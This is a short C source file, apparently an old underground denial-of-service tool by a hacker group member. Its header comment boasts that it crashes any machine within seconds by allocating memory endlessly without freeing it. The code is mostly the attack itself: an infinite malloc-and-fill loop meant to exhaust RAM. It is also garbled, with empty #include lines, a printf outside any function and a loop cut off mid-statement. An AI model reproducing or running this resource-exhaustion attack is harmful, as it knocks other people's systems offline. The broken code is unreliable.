/* Local MEM Alloc DoS Util by -TaLLa- !!! PRIVATE !!! Don't distribute !!! Only for etC Members !!! This exploit is killing every Box. It allocates the MEM but it no more gives the mem free. A box with 64MB RAM you get killed within 10 secs. Only tested under RedHat 6.1 - The box crashed within 6secs. ENJOY !!! Greetz to: ScriptKid, Dor, torn, SpEEd_, Sensei and all other etC!-Members */ #include #include printf("DoS Alloc Exploit by TaLLa (etC!) - Crashing Box ...."); void main() { unsigned short int c,c2; int *p[0xFFFF],*point; for(;;) { for(c=0;(p[c]=malloc(0xFFFF))!=0;c++) { point=p[c]; for(c2=0;c2<0xFFFF/4;c2++) point[c2]=random; } for(c2=0;c2